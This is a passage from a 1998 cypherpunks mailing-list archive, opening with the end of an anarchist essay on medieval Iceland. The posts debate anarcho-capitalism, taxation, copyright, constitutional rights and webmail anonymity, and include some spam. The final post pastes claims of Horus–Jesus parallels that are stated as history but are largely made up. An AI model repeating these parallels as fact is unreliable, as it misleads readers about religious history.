   system in the thirteenth century. But so long as power was reasonably
   dispersed, as it seem to have been for the first two centuries after
   the system was established, this was a less serious problem." [Op.
   Cit.]
   
   Which is quite ironic. Firstly, because the first two centuries of
   Icelandic society was marked by non-capitalist economic relations
   (communal pricing and family/individual possession of land). Only when
   capitalistic social relationships developed (hired labour and property
   replacing possession and market values replacing social ones) in the
   12th century did power become concentrated, leading to the breakdown
   of the system in the 13th century.
   
   Secondly, because Friedman is claiming that "anarcho"-capitalism will
   only work if there is an approximate equality within society! But this
   state of affairs is one most "anarcho"-capitalists claim is impossible
   and undesirable!
   
   They claim there will always be rich and poor. But inequality in
   wealth will also become inequality of power. When "actually existing"
   capitalism has become more free market the rich have got richer and
   the poor poorer. Apparently, according to the "anarcho"-capitalists,
   in an even "purer" capitalism this process will be reversed! It is
   ironic that an ideology that denounces egalitarianism as a revolt
   against nature implicitly requires an egalitarian society in order to
   work.
   
   In reality, wealth concentration is a fact of life in any system based
   upon hierarchy and private property. Friedman is aware of the reasons
   why "anarcho"-capitalism will become rule by the rich but prefers to
   believe that "pure" capitalism will produce an egalitarian society! In
   the case of the commonwealth of Iceland this did not happen - the rise
   in private property was accompanied by a rise in inequality and this
   lead to the breakdown of the Republic into statism.
   
   In short, Medieval Iceland nicely illustrates David Weick's comments
   (as quoted in section F.6.3) that "when private wealth is
   uncontrolled, then a police-judicial complex enjoying a clientele of
   wealthy corporations whose motto is self-interest is hardly an
   innocuous social force controllable by the possibility of forming or
   affiliating with competing 'companies.'" This is to say that "free
   market" justice soon results in rule by the rich, and being able to
   affiliate with "competing" "defence companies" is insufficient to stop
   or change that process.
   
   This is simply because any defence-judicial system does not exist in a
   social vacuum. The concentration of wealth -- a natural process under
   the "free market" (particularly one marked by private property and
   wage labour) -- has an impact on the surrounding society. Private
   property, i.e. monopolisation of the means of production, allows the
   monopolists to become a ruling elite by exploiting, and so
   accumulating vastly more wealth than, the workers. This elite then
   uses its wealth to control the coercive mechanisms of society
   (military, police, "private security forces," etc.), which it employs
   to protect its monopoly and thus its ability to accumulate ever more
   wealth and power. Thus, private property, far from increasing the
   freedom of the individual, has always been the necessary precondition
   for the rise of the state and rule by the rich. Medieval Iceland is a
   classic example of this process at work.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Wed, 11 Nov 1998 07:28:21 +0800
To: ravage@einstein.ssz.com
Subject: Re: fuck copyright (Re: Advertising Creepiness) (fwd)
In-Reply-To: <199811101343.HAA17689@einstein.ssz.com>
Message-ID: <199811102109.VAA09630@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Jim Choate writes:
> From: "Frank O'Dwyer" <fod@brd.ie>
> > Jim Choate wrote:
> > > > You can make money from information provision by charging extra for
> > > > up-to-date news, or by charging so little that the cost from the
> > > > original provider is so low that it's not worth anyones time to
> > > > redistribute it,
> > > 
> > > That's true now, why don't we see these effects...
> > 
> > We do. News inherently has a 'sell-by' date. The most obvious example is
> > stock quotes where delayed quotes are provided for free whereas
> > real-time quotes are heavily charged for. 
> 
> Ah, true but I was addressing the last sentence about the cost being so low
> nobody will charge for it.....sounds like the nuclear industry marketing
> speal of the 50's....

One barrier to such an enterprise is the domain name recognition,
people want wired, they type wired.com; what do they type if they want
the lower priced mirrors?

In a sense the banner stripping companies are already doing just this
service: they attempt to provide you (or assist you in obtaining)
banner stripped versions of anything, and they charge you for the
service.  Therefore one might (somewhat weakly) argue that they
deprive wired (and others) of click through revenue and they charge
you thus diverting funds wired et al might otherwise have got.

This illustrates my point about charging little.  If this type of
enterprise suceeds this indicates that some information providers are
charging too much (too many banners, to an distracting and intrusive
extent).

If the banners strippers became popular (eg. distributed with
netscape!), the solution for those employing the banner approach to
charging is to tone down the banners a bit.  I reckon they could do
with toning down -- it is getting ridiculus most of the bandwidth
through my trusty 28.8k modem is bloody banners these days!  (Phone
calls cost per second in the UK, and I am impatient anyway, so would
prefer faster access.)

Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Wed, 11 Nov 1998 11:53:39 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: IP: Clinton Wants Loophole In U.S. Free Speech Closed (fwd)
Message-ID: <199811110331.VAA22384@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 10 Nov 1998 19:25:40 -0800 (PST)
> From: b!X <bix@geekforce.org>
> Subject: Re: IP: Clinton Wants Loophole In U.S. Free Speech Closed

> Yeah yeah all very well and good parody except that the 2nd amendment
> contains the word "well-regulated" and the 1st doesn't. 
> 
> (And yes I know I'm asking for a shitstorm of trouble saying that on THIS
> list of all places).

 
				ARTICLE I. 
 
	Congress shall make no law respecting an establishment of religion, 
or prohibiting the free exercise thereof; or abridging the freedom of 
speech, or of the press; or the right of the people peaceably to assemble, 
and to petition the Government for a redress of grievances. 
 
 
 
				ARTICLE II. 
 
	A well regulated Militia, being necessary to the security of a 
free State, the right of the people to keep and bear arms, shall not be 
infringed. 
 

I'd say that 'shall make no law' is a clear as 'shall not be infringed' and
pretty equivalent in meaning.

See, no shit-storm (they reserve that for me...;).



    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frederick Burroughs <riburr@shentel.net>
Date: Wed, 11 Nov 1998 11:00:54 +0800
To: Cypherpunks <cypherpunks@ns.minder.net>
Subject: Re: Strange brew (was Off Topic But Truly Beautiful)
In-Reply-To: <3648A1A9.7DE1@lsil.com>
Message-ID: <3648F7C5.423923CE@shentel.net>
MIME-Version: 1.0
Content-Type: text/plain





Michael Motyka wrote:

> Clyde wrote:
> >
> > Long but fascinating...
> >
> >     ---------------------------------------------------------------
> >
> >     9 November 1998
> >
> >     DATELINE--Tallahassee, Fla.
> >     Oranges that get you high
> >     ===========================
> >
> >     A Florida Biochemist designs a citrus tree with THC.

[savagely pruned]

> >     Copyright 1994-98 San Francisco Bay Guardian.

Satirization or prophesy, the walls are coming down. Whether they be the
borders of  nationstates or the dna of species, the boundaries that once
defined are now dissolving. Look for transgenic terrorists to engineer terror
down to the genetic level. Psilocybin from Saccharomyces, now that'll make a
heady wine. Developments along these lines are advancing in Brazil and South
Africa. Freeze dried packets (with psychedelic holographic label designs) are
available via mail order to csychomimetic enologists.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Wed, 11 Nov 1998 12:40:14 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Elder Kennedy ordered to tesify to Grand Jury (if you can call it that) [CNN]
Message-ID: <199811110414.WAA22671@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> X-within-URL: http://www.cnn.com/US/9811/10/kennedy.testimony.ap/

>    STAMFORD, Connecticut (AP) -- A Florida judge on Tuesday ordered the
>    elderly brother of Ethel Kennedy to testify before a Connecticut grand
>    jury investigating a 1975 slaying in which his two sons are suspects.
>    
>    Rushton Skakel, 74, of Hobe Sound, Florida, was ordered to testify
>    about what he knows about the slaying of Martha Moxley, a 15-year-old
>    Greenwich girl who was bludgeoned to death with a golf club.

...

>    The case stalled for years but was revived this spring by the
>    appointment of a grand jury consisting of a single judge.

[remainder deleted]

Now if that isn't unconstitutional I don't know what is. He and his lawyer
should be screaming bloody murder (figuratively).


    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Albert P. Franco, II" <apf2@apf2.com>
Date: Wed, 11 Nov 1998 06:23:15 +0800
To: Soren <sorens@workmail.com>
Subject: Re: dbts: Privacy Fetishes, Perfect Competition, and the  Foregone(fwd)
In-Reply-To: <5F152E6E8E6FD21195DF00104B2425AD02B276@yarrowbay.chaffeyhomes.com>
Message-ID: <3.0.3.32.19981110224329.008bc5b0@apf2.com>
MIME-Version: 1.0
Content-Type: text/enriched

 At 09:33 10/11/98 -0500, you wrote: 
>>>>
Albert P. Franco, II wrote: 
I've been lurking on this thread for a while, and I am amazed by the level 
of utopist muck that is being spewed here by you. 

Without some government the Bad Guys will be the only ones with anything. 
It is only with the threat of losing their power that leaders do good. If 
they had no power which could be lost or taken they will always do what's 
best for them in the short term, which is usually to shit on the peons. 
Dictators (like Pinochet and Gates) do their dirty deeds because they feel 
no need to placate the masses.
And the Bad Guys don't have everything already? Are they in any danger of losing their power? 
<<<<

They don't have my car, my computers, or my house and other belongings. They not in as much danger as they should be, but they can be impeached and loose elections.

>>>>
This anarcho-capitalist spew is so much crap that the bullshit indicators 
are blaring at top volume. If the people can't control a constitutional 
government, known for having peacefully free elections for over two hundred 
years, then how the hell do think you can convince somebody that the people 
are going to be able to control warlords and monopolies. It's called, "You 
don't like it? Bang, Bang, you're dead!"
And this differs from living in in a 1st world state, how? 
<<<<

Where do you live? I know LA and some other big cities are pretty bad, but come on no one seriously believes that under "civilized" governments (1st World State) that this is ubiquitously the way it is. Under the anarcho-capilist system proposed it would be the ubiquitous state of affairs.

>>>>
Try to lift yourself out of the bullshit of your theory and give us at 
least one REAL example (current or historic) of a large scale, long lasting 
anarcho-capitalist society. Hippie communes are too small, and make sure 
it's capitalistic. If you can't think of one in the next year or so then 
come back and tell us.
Is there some specific reason they need to be large scale or long lasting?  By definition, anarcho-capitalism is constantly changing -- perhaps as much as between extreme individualism, to the current state of feudalism that has pervaded the world since the birth of agrarianism. 
<<<<

Peace and prosperity require stability. If your system is ever changing then there will never be long term investments and thus no new technologies or products. Barbarism (anarcho-free market-etc. but never capitalism since capital investments are only made where a return can be guaranteed) will never serve as a basis for investment and development since there is no way to reasonably expect to be around long enough to get the pay back.

If it isn't large scale it's just more bullshit on the already smoldering pile dumped on this list to date. Because it works for twelve people in an isolated environment in no way signifies that it will scale to level of a nation.

Sorry, if ain't large scale and long lasting it ain't real.

>>>>
I agree with you that most utopianist ranting here carries a strong whiff of frustration and steam venting.  To those anarcho-capitalists, I recommend the course of action I took 25 years ago.  If you don't like the state you live in, don't patronize it.  There are many save harbors in the world that better approach your ideals, and are more amenable to change, than the Union of Socialist Americans. 

"Educate, don't agitate". 


<<<<

I left the good ol' USA too. I now live in a European country with a strong socialistic government and I actually find very little interference in my day to day life. In fact there seems to be a much higher awareness that each individual is responsible for his and her actions. At the very least there aren't as many lawyers claiming everyone is a victim of something or another (ie. too hot coffee, slippery floors, home owners that shot the poor intruder who didn't get a warning first, etc.) 

Ain't no where perfect, anarcho-whatever was done about 4000 years ago, I generally prefer to look forward...

APF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jake  <jake116@hotmail.com>
Date: Wed, 11 Nov 1998 15:18:14 +0800
To: <cypherpunks@toad.com>
Subject: Important news from DAVOC  (-flash3 site-)
Message-ID: <419.436109.95012708jake116@hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain



   

   Greetings from the Underground......
   this message is presented to you by the U.S.


   http://www.DAVOC.com  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Reeza! <howree@cable.navy.mil>
Date: Tue, 10 Nov 1998 22:16:44 +0800
To: Adam Back <vznuri@netcom.com
Subject: Re: How to solve the tax problem w/o anarchy or force
In-Reply-To: <199811090528.VAA01234@netcom13.netcom.com>
Message-ID: <3.0.5.32.19981110233948.00855b80@205.83.192.13>
MIME-Version: 1.0
Content-Type: text/plain



At 11:11 PM 11/9/98 GMT, Adam Back wrote:
>
>Vladimir writes:
>> what we really need is a government which can personalize its
>> services, and people pay for what they use. 
>
>yes, agree.  In other words we need freedom for business to compete in
>provision of all services currently monopolised by government.

I think a distinction needs to be made between what they (the Sheeple{tm})
NEED and what they "Request for Convenience". Wrongfull lawsuits and
welfare careerists in mind, I think this is an important distinction.

--snip--

>If you can opt out of literally any goverment service, I suspect
>government revenues would nearly disappear.  Everything they "supply"
>can be supplied more cheaply by business.  So what government remained
>would have to compete on a fair basis with private industry.

Not so fast, Kimosabe- what business would rule against itself a la the
Supreme Court against Congress, when a business decision was spiritually
and/or lawfully in violation of the constitution and legitimately passed
laws enacted since its inception???

>> the big quandary is people who can't pay for what they use
>> like social security. ultimately the question is how much
>> money the state has the authority to collect for this kind of
>> thing, and the political answer has varied every year, but it
>> has gone up every year in the 20th century generally.
>
>I think the state should have no authority to collect anything.
>Charity at the point of a gun is not charity.  The state is an
>extremely inefficient distributor of charitable funds anyway.

This goes back to the "what they NEED vs. what they request for convenience
(theirs)" argument.

>> the big problem imho is fraud/waste/corruption in govt though.  I

definitely a problem. Should AP politics apply??? What would be the method
of redress for infractions that were so heinous that the perpetrator was
deemed untrustworthy and removal from office the only recourse? Who would
"remove" the heinous individual for incarceration in an appropriate
facility??? Who would decide that such action was warranted???

>> think if a lot of it were eliminated we would be flabbergasted at
>> how little a personal contribution it takes to take care of people
>> who need it. bureaucracies are the most expensive thing on the
>> planet. here's hoping that cyberspace will cut through the
>> *ultimate* middleman: govt.
>
>Amen to that.
>
>Adam

Perhaps we should view the internet as a wedge, not as the fulcrum, lever
and force. I think it would be intuitive, instructive, and demonstrative to
operate on that premise rather than the "here is the internet, my trump
card, I rest my case" style of argument.

Reeza!


	If you see a man approaching you with the obvious intention 
	of doing you good, you should run for your life.
				-stolen from a cypherpunk sig




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Reeza! <howree@cable.navy.mil>
Date: Tue, 10 Nov 1998 22:21:04 +0800
To: cypherpunks@cyberpass.net
Subject: RE: How to solve the tax problem w/o anarchy or force (fwd)
In-Reply-To: <5F152E6E8E6FD21195DF00104B2425AD02B275@yarrowbay.chaffeyhomes.com>
Message-ID: <3.0.5.32.19981110234947.008717d0@205.83.192.13>
MIME-Version: 1.0
Content-Type: text/plain



At 05:25 PM 11/9/98 -0800, Matthew James Gering wrote:
>
>Vladimir Z. Nuri wrote:
>
>> cpunks actually contribute to this problem with their nihilistic
>> philosophy in general. the msg is that it is a waste of time
>> to engage in group activity or political discourse or lobbying
>> against the govt or organization or *whatever*... it's actually
>> just a variant on the sheeple passivity.
>
>
>"If you think of yourselves as helpless and ineffectual, it is 
>certain that you will create a despotic government to be your 
>master. The wise despot, therefore, maintains among his subjects 
>a popular sense that they are helpless and ineffectual." 
>                          --Frank Herbert, The Dosadi Experiment 
>
>
>I don't think many cpunks (and other freedom loving people) are necessarily
>nihilistic so much as they have come to the conclusion that to ignore and/or
>subvert government has higher probability of success than trying to reform
>it -- much to the demise of the Libertarian Party. The whole cryptography
>and geodesic communications being the bane of the nation-state theme tends
>to support this idea.
>
>	Matt

The problem is ill-defined. 
the Problem is ill-defined.
the problem is Ill-Defined.

The problem is not cpunks, it is the perception others have towards cpunks.
I think the laws of society will prevent the message(tm) from reaching the
Sheeple(tm) because it would be a disruption in the Daily Routine(tm).

Who coined the phrase; "a sane man, in an insane society...."

Reeza!
 _____________________________________________________________________
|                                                                     |
|   "It is a doctrine of war not to assume the enemy will not come,   |
|    but rather to rely on one's readiness to meet him..."            |
|                                                                     |
|				      		--  Sun Tsu           |
|_____________________________________________________________________|




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Reeza! <howree@cable.navy.mil>
Date: Tue, 10 Nov 1998 22:31:48 +0800
To: Adam Back <petro@playboy.com
Subject: Re: charity at the point of a gun (Re: dbts: Privacy Fetishes, Perfect Competition, and the Foregone) (fwd)
In-Reply-To: <v04011709b26cfc756e2d@[206.189.103.230]>
Message-ID: <3.0.5.32.19981110235838.007dd830@205.83.192.13>
MIME-Version: 1.0
Content-Type: text/plain



At 12:27 AM 11/10/98 GMT, Adam Back wrote:
>
>Christopher Petro writes:
>> 	In other words Jim, Fuck You. I, and I'd bet most people here,
>> including Mr. May, are perfectly willing, and hell even eager to pay their
>> share, to assume their social responcibility, they just get very, very
>> angry at having to pay OTHER peoples social responcibility, and get very,
>> very angry at having to pay for other shit (Senate Luncheons and Swimming
>> Pools, the Militaries greatly inflated budget, all the waste that is todays
>> federal government).
--interrupt--

I would question, sagely (IMHO), 

do not confuse the military budget- you know, the Military budget- with the
NSA portion of the military budget- last I heard they were getting about
1/3rd. Meanwhile, the lowly Military- Navy at least, is operating at 3 or 4
X the prior tempo with a significantly reduced portion of that military
budget.

Gee, is the current administration trying to reduce military infrastructure
by wearing it out- and not purchasing repair parts or replacements???

Or all the dollars going towards the DNA database, Echelon, and ???

--resume usual conversation--


>What is annoying is "charity" (social security) at the point of a gun.
>Our "conscience" is being decided by government which is acting as a
>broker for those lobby for their "need" and for your assets to be
>stolen and redistributed to them.
>
>What people aren't willing to pay for shouldn't happen.  Period.  If
>that means people starve well those complaining loudest had better
>dig deeper into their pockets.
>
>Anything else is socialism tending to facism, as Hayek argues in The
>Road to Serfdom.
>
>> >No state can govern those who don't wish to be governed, violence or no.
>> 
>> 	Yes, but a state can kill those who don't wish to be governed. Can
>> and does routinely.
>
>That's what's so interesting about cyberspace, once the payment
>systems get there -- government thugs can't beat up, murder, or
>incarcerate anonymous nyms.  _Then_ Jim's "No state can govern those
>who don't wish to be governed" starts to become true.
>
>Adam
>
>
>

	If you see a man approaching you with the obvious intention 
	of doing you good, you should run for your life.
				-stolen from a cypherpunk sig




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Reeza! <howree@cable.navy.mil>
Date: Tue, 10 Nov 1998 22:59:39 +0800
To: cypherpunks@einstein.ssz.com
Subject: Re: dbts: Privacy Fetishes, Perfect Competition, and the Foregone (fwd)
In-Reply-To: <199811100205.UAA14919@einstein.ssz.com>
Message-ID: <3.0.5.32.19981111001918.00858100@205.83.192.13>
MIME-Version: 1.0
Content-Type: text/plain



At 08:05 PM 11/9/98 -0600, Jim Choate wrote:
>Forwarded message:
>
>> Date: Mon, 9 Nov 1998 15:27:14 -0500
>> From: Petro <petro@playboy.com>
>> Subject: Re: dbts: Privacy Fetishes, Perfect Competition, and the Foregone
>>  (fwd)

--snip--

>> 	In other words Jim, Fuck You. I, and I'd bet most people here,
>> including Mr. May, are perfectly willing, and hell even eager to pay their
>> share, to assume their social responcibility, they just get very, very
>> angry at having to pay OTHER peoples social responcibility, and get very,

I was following the discourse in this post avidly, until I came to this
paragraph.

You do not know what Tim May thinks. No one except Tim May knows what Tim
May thinks. Your presumption is an insult to Tim May, and everyone else who
might happen to be "graced" by your presumption of what "they" think.

I suggest you take your own advice, don't choke when you swallow. Remember,
you deserve it.

You lose.



	If you see a man approaching you with the obvious intention 
	of doing you good, you should run for your life.
				-stolen from a cypherpunk sig




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: PCBSUPPORT@PICOBELLO.COM
Date: Wed, 11 Nov 1998 08:55:59 +0800
To: cypherpunks@toad.com
Subject: PiCoBello-Web-Speed-Installation-Instructions
Message-ID: <B0000399487@n3-server.cybertex.ch>
MIME-Version: 1.0
Content-Type: text/plain



Hi,


Thanks for downloading our software.Please go through download-instruction.



PiCoBello  Web-Speed  wird  vorerst wie eine volle Version laufen.
Nach 20 mal Abspeichern, oder nach 30 Tagen ab Installationsdatum,
folgt  ein  passives  Demonstrationsprogramm  ohne  die Funktionen
Speichern und Drucken.

Bei  Bezahlungen mit Kreditkarte gewhrt PiCoBello Web-Speed fr 2
Wochen eine Geld  zurck  Garantie.

Sollten Sie Probleme haben, schreiben Sie uns bitte eine Email,wir
helfe Ihnen gerne.

Ihr PiCoBello Web-Speed Team. 

http://www.web-speed.com























From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Reeza! <howree@cable.navy.mil>
Date: Wed, 11 Nov 1998 00:17:40 +0800
To: cypherpunks@einstein.ssz.com
Subject: RE: dbts: Privacy Fetishes, Perfect Competition, and the Foregone (fwd)
In-Reply-To: <199811100252.UAA15446@einstein.ssz.com>
Message-ID: <3.0.5.32.19981111012502.0085b210@205.83.192.13>
MIME-Version: 1.0
Content-Type: text/plain



At 08:52 PM 11/9/98 -0600, Jim Choate wrote:
>Forwarded message:
>
>> Date: Mon, 9 Nov 1998 13:23:20 -0500
>> From: Petro <petro@playboy.com>
>> Subject: RE: dbts: Privacy Fetishes, Perfect Competition, and the Foregone
>>  (fwd)
>
>> 	Usualy !=3D Correctly.
>> 
>> 	Take tomatoes. Perfectly legal (AFAIK) everywhere, here in this
>> country a 5 year old child can buy a tomato from a farmer with a stand on
>> the side of the road.
>> 
>> 	If you go back 10 years, and if "this country" was the soviet
>> union, a tomato purchased from the wrong person could get you in trouble.
>
>So what are saying...that because any government ever happened to abuse its
>citizens in a particular way is justification to do away with all
>government?
>
>This is a strawman.


I think there may be a finer distiction- it lies in corruption of the
enforcing body. A tomato purchased on the black market is significant of 
	a) a seller with goods
	b) a buyer with money
	c) a buyer who can be fined for making purchases on the black
	   market because they obviously have money.

This is the same sort of tactic imho as the war on drugs(tm). Big show,
little enforcement, extract money from the money holders. Money exchanges =
leniency.

--snip--


>> 	I still maintain that as one moves closer to a completely free
>> market, there is less and less of a black market, and to be the extrememe
>> case of a free market, there would be the potential to trade in both human
>> lives, and in stolen property.
>
>Well, at least you're an honest eco-anarchist. And how do you propose to stop
>this sort of behaviour (it's clear that there is a market whether the
>economy is free-market or not) without some sort of 3rd party arbiter (call
>it government or not is irrelevant to the point)?


Aside from the comment on honesty, the rest of this reply is sophistry.
Petro was asserting a point, which Jim acknowledged, then procedes to
assassinate with particulars of questionable relevance. In a true anarchy,
who is to say that trade in human lives and stolen property must be stopped
in that "true free market"???


>> In a free market, the selling of stolen
>> goods might not be a crime in and of itself, but the posession of those
>> things could be,
>
>How the hell do you sell something on the black market if you don't have
>possession of it? And exactly who is going to prosecute anyone for
>possession? Since we've done away with laws governing economics and trade
>there isn't even a court to try the perps in if we did apprehend them
>ourselves.

I smell straw man. A reseller is not necessarily a "possessor". By virtue
of this loophole in existing law (which *could* become the rule de jour),
many items are offered for sale, which are not necessarily legal to
"possess". Don't say name "one", 'cuz I already have it in mind. Does a
black marketeer qualify as a "reseller"??? DamnIfyno. Is there a precedent
that would by honored in a society such as the hypothetical one being
discussed??? DamnIfyno again. But it is an interesting question, I think.
Most likely is that "protection monies" would get paid, the purchaser
arrested on his way _away_ from the *shop* where the purchase was made.


Reeza!


	If you see a man approaching you with the obvious intention 
	of doing you good, you should run for your life.
				-stolen from a cypherpunk sig




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Thu, 12 Nov 1998 02:54:23 +0800
To: cypherpunks@cyberpass.net
Subject: Free Email as Anonymous Remailer Re: NPR is at it again...
In-Reply-To: <v04020a2ab26e42c57116@[139.167.130.247]>
Message-ID: <3.0.5.32.19981111015237.0079f350@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



>>Some commie law professor broad :-) is talking about how there oughtta be a
>>law against anonymous remailers, deja news, and various forms of "illegal"
>>email...   >>The ganglia twitch...
>
>like hotmail and yahoo mail??? these are *awesome* remailers. I picked
>up a yahoo mail account recently and am blown away with all the *FEATURES*!!
>separate folders, filtering, external mailboxes support through POP,
>binary attachments, my gosh!!!!! my cup runneth over, for free, TOTALLY
>ANONYMOUS   check it out cpunks, a cpunk wet dream!!

They're NOT SECURE!  But Web anonymizers can fix most of the holes.
In particular, Hotmail + www.anonymizer.com is a reasonable
substitute for the old penet.fi remailer.

There are scurrilous rumors that some people actually put bogus information on 
their free email accounts!  (My cat certainly didn't do that :-)
But the portal services can keep records of who's connecting to them,
at least by IP address, which can be traced back to ISPs,
and from there back to phone lines, etc., depending on the extent
of records the various ISPs keep.  It's not enough without anonymizers.

I suspect this is what will replace the current remailer system -
chaining through some set of Crowds, Onions, and commercial and free
anonymizers to reach a free email system to transmit and receive email.
An interesting project would be a free low-volume anonymizer cgi for Apache,
given the large number of current users and the much larger number
of people who will run web servers once they have cable modems.

				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Reeza! <howree@cable.navy.mil>
Date: Wed, 11 Nov 1998 01:09:53 +0800
To: Quirk <cypherpunks@cyberpass.net
Subject: Re: an odd one at pub.anonymizer
In-Reply-To: <Pine.SOL.3.96.981109224331.25593G-100000@cyberpass.net>
Message-ID: <3.0.5.32.19981111021629.007b8460@205.83.192.13>
MIME-Version: 1.0
Content-Type: text/plain



At 10:47 PM 11/9/98 -0800, Quirk wrote:
>
>--mark--
>-hedges- reviews http://pub.anonymizer.com/~lcchrist
>
>The National Socialist Church of Christ espouses a turning away from the
>old era figuring Hitler and the current Destruction of the Earth Part II
>as the antichrist ending the cycle of Pisces. In the next phase of polar
--snip--

Your prose panders to others of your mindset, but you are all mistaken.

--begin pasted text--

It is a Christian belief that life and immortality were brought to light,
and death, the last enemy, was destroyed by a personal Jesus only 2,000
years ago. The very same revelation had been accredited to Horus (a major
egyptian god), the anointed, at least 3,000 years before. Horus, as the
impersonal and ideal revealer, was the Messiah in the astronomical
mythology and the Son of God in the eschatology. The doctrine of
immortality is so ancient in Egypt that the "Book of Vivifying the Soul
Forever" was not only extant in the time of the First Dynasty but was then
so old that the true tradition of interpretation was at that time already
lost.

The Egyptian Horus, as revealer of immortality, was the ideal figure of the
ancient spritualists that the soul of man, or the Manes, persisted beyond
death and the dissolution of the present body.

The Origin and Evolution

We find, depicted on stones in many countries where the Stellar Cult people
migrated, remains of the old Astronomical religion which proves their
perfect knowledge of the revolutions of the Starry Vast and the Laws
governing these revolutions, all of which they imaged iconographically or
by Signs and Symbols. And where they have not built Pyramids they have
recorded the truth in the so-called "Cups and Rings" and "curious carvings"
found on boulders, cist-covers, on living rock, and on standing stones
throughout the British Isles, Europe, Asia, Africa, and other parts of the
world - which hitherto have been deemed to involve insoluble problems and
have been to all our learned professors an outstanding puzzle in
pre-historic research. But they are easily read, and the secrets are
unfolded in the Sign Language of the Astronomical, or Stellar Cult Religion
of the Ancient Egyptians.

The mutilation of Osiris in his coffin, the stripping of his corpse and
tearing it asunder by Set, who scattered it piecemeal, has its equivalent
by the stripping of the dead body of Jesus whilst it still hung upon the
Cross, and parting the garments amongst the spoilers. 

In St. John's account the crucifixion takes place at the time of the
Passover, and the victim of sacrifice in human form is substituted for, and
identified with, the Paschal Lamb. But, as this version further shows, the
death assigned is in keeping with that of the non-human victim. Not a bone
of the sufferer to be broken. This is supposed to be in fulfilment of
prophecy. It is said by the Psalmist (34:20): "He keepeth all His bones;
not one of them is broken". But this was in strict accordance with the
original law of Tabu. No matter what the type, from bear to lamb, no bone
of the sacrificial victim was ever permitted to be broken; and the only
change was in the substitution of the human type for the animal, which had
been made already when human Horus became the type of sacrifice instead of
the calf or lamb. When the Australian natives sacrificed their little bear,
not a bone of it was ever broken. When the Iroquois sacrificed the white
dog, not a bone was broken. This was a common custom, on account of the
resurrection as conceived by the primitive races, and the same is applied
to Osiris-Horus. Every bone of the skeleton was to remain intact as a basis
for the future building.

It is an utterance of the Truth that is eternal to say that Horus as the
Son of God had previously been all the Gospel Jesus is made to say his is,
or is to become:

Horus and the Father are one;

*Jesus says, "I and my Father are one". He that seeth Me, seeth Him that
sent me".
*Horus is the Father seen in the Son.
*Jesus claims to be the Son in whom the Father is revealed.

*Horus was the light of the world, the light that is represented by the
symbolical eye, the sign of salvation.
*Jesus is made to declare that He is the light of the world.

*Horus was the way, the truth, the life by name and in person.
*Jesus is made to assert that he is the way, the truth, and the life.

*Horus was the plant, the shoot, the natzar.
*Jesus is made to say: "I am the true vine".

*Horus says: "It is I who traverse the heaven; I go around the Sekhet-Arru
(the Elysian Fields); Eternity has been assigned to me without end. Lo! I
am heir of endless time and my attribute is eternity".
*Jesus says: "I am come down from Heaven. For this is the will of the
Father that everyone who beholdeth the Son and believeth in Him should have
eternal life, and I willl raise him up at the last day"
He, too, claims to be the lord of eternity.

*Horus says: "I open the Tuat that I may drive away the darkness"
*Jesus says: "I am come a light unto the world."

*Horus says: (I am equipped with thy words O Ra (the father in
heaven)(ch.32) and repeat them to those who are deprived of breath.
(ch.38). These were the words of the father in heaven.
*Jesus says: "The Father which sent me, he hath given me a commandment,
what I should say and what I should speak. Whatsoever I speak, therefore,
even as the Father said unto me, so I speak the word which ye hear is not
mine, but the Father's which sent me".


   A comparative list of some pre-existing types to Christianity shows
further how these types were brought on in the canonical Gospels and the
Book of Revelation:

*Horus baptized with water by Anup = Jesus baptized with water by John.

*Aan, a name of the divine scribe = John the divine scribe.

*Horus born in Annu, the place of bread = Jesus born in Bethlehem, the
house of bread

*Horus the Good Shepherd with the crook upon his shoulders = Jesus the Good
Shepherd with the lamb or kid upon his shoulder

*The Seven on board the boat with Horus = The seven fishers on board the
boat with Jesus

*Horus as the Lamb = Jesus as the Lamb.

*Horus as the Lion = Jesus as the Lion

*Horus identified with the Tat or Cross = Jesus identified with the Cross

*Horus of twelve years = Jusus of twelve years

*Horus made a man of thirty years in his baptism = Jesus made a man of
thirty years in his baptism

*Horus the Krst = Jesus the Christ

